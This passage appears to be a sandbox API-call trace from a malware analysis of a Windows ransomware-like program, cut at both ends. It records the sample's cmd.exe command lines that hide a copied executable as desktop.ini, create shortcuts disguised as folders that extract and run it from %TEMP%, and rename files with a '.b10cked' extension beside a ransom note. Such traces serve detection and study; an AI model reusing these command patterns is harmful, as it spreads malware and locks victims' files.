\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0200.255] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0200.255] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1") returned 0x23 [0200.255] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x14a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x14a [0200.255] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0200.256] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x8a4, dwThreadId=0xff8)) returned 1 [0200.731] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0204.640] CloseHandle (hObject=0x120) returned 1 [0204.640] CloseHandle (hObject=0x1b4) returned 1 [0204.640] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0204.640] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0204.641] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0204.641] GetTickCount () returned 0x39ab8 [0204.641] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=26143000204) returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x78\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x51\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x5a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6d\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x46\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x65\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x67\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4f\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0204.641] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0204.641] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0204.641] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0204.641] CharUpperBuffW (in: lpsz="explorer.exe \"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\" & type \"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9d | out: lpsz="EXPLORER.EXE \"{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\" & TYPE \"{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9d [0204.641] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0204.641] CharUpperBuffW (in: lpsz="explorer.exe \"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\" & type \"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9e | out: lpsz="EXPLORER.EXE \"{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\" & TYPE \"{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9e [0204.641] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0204.641] CoInitialize (pvReserved=0x0) returned 0x0 [0205.166] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0205.168] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0205.168] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0205.168] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0205.171] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\" & type \"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\desktop.ini\" > \"%TEMP%\\xQZmFegO.exe\" && \"%TEMP%\\xQZmFegO.exe\"") returned 0x0 [0205.171] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0205.171] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0205.171] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0205.171] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}.lnk", fRemember=0) returned 0x0 [0205.180] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0205.180] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0205.180] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0205.180] CoUninitialize () [0205.181] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0205.181] ReleaseMutex (hMutex=0xf8) returned 1 [0205.181] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0205.181] ReleaseMutex (hMutex=0xf8) returned 1 [0205.181] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0205.181] ReleaseMutex (hMutex=0xf8) returned 1 [0205.181] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0205.181] ReleaseMutex (hMutex=0xf8) returned 1 [0205.181] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0205.181] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.181] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.182] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=26197084637) returned 1 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x27e [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.182] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x27e [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0205.183] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0205.184] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x27e [0205.184] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0205.184] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0205.184] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0205.184] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x27e [0205.184] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0205.184] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0205.184] ReadFile (in: hFile=0x120, lpBuffer=0x14a8b58, nNumberOfBytesToRead=0x13e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14a8b58*, lpNumberOfBytesRead=0x12ec08*=0x13e, lpOverlapped=0x0) returned 1 [0205.185] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0205.186] WriteFile (in: hFile=0x120, lpBuffer=0x14a8b58*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14a8b58*, lpNumberOfBytesWritten=0x12ec1c*=0x13e, lpOverlapped=0x0) returned 1 [0205.186] SetFilePointer (in: hFile=0x120, lDistanceToMove=-318, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x140 [0205.186] ReadFile (in: hFile=0x120, lpBuffer=0x14a8b58, nNumberOfBytesToRead=0x13e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14a8b58*, lpNumberOfBytesRead=0x12ec08*=0x13e, lpOverlapped=0x0) returned 1 [0205.186] SetFilePointer (in: hFile=0x120, lDistanceToMove=-318, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x140 [0205.186] WriteFile (in: hFile=0x120, lpBuffer=0x14a8b58*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14a8b58*, lpNumberOfBytesWritten=0x12ec1c*=0x13e, lpOverlapped=0x0) returned 1 [0205.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0205.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x131322c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0205.191] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x27e [0205.191] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0205.192] CloseHandle (hObject=0x120) returned 1 [0205.193] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm") returned 0x2d [0205.193] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\") returned 0x24 [0205.194] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x928, dwThreadId=0xf78)) returned 1 [0205.277] CloseHandle (hObject=0x1b4) returned 1 [0205.277] CloseHandle (hObject=0x120) returned 1 [0205.277] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\") returned 0x48 [0205.277] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0205.278] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\", cchCount1=72, lpString2="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\", cchCount2=72) returned 3 [0205.278] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\") returned 0x48 [0205.278] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0205.278] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0205.278] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0205.278] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0205.278] CharUpperBuffW (in: 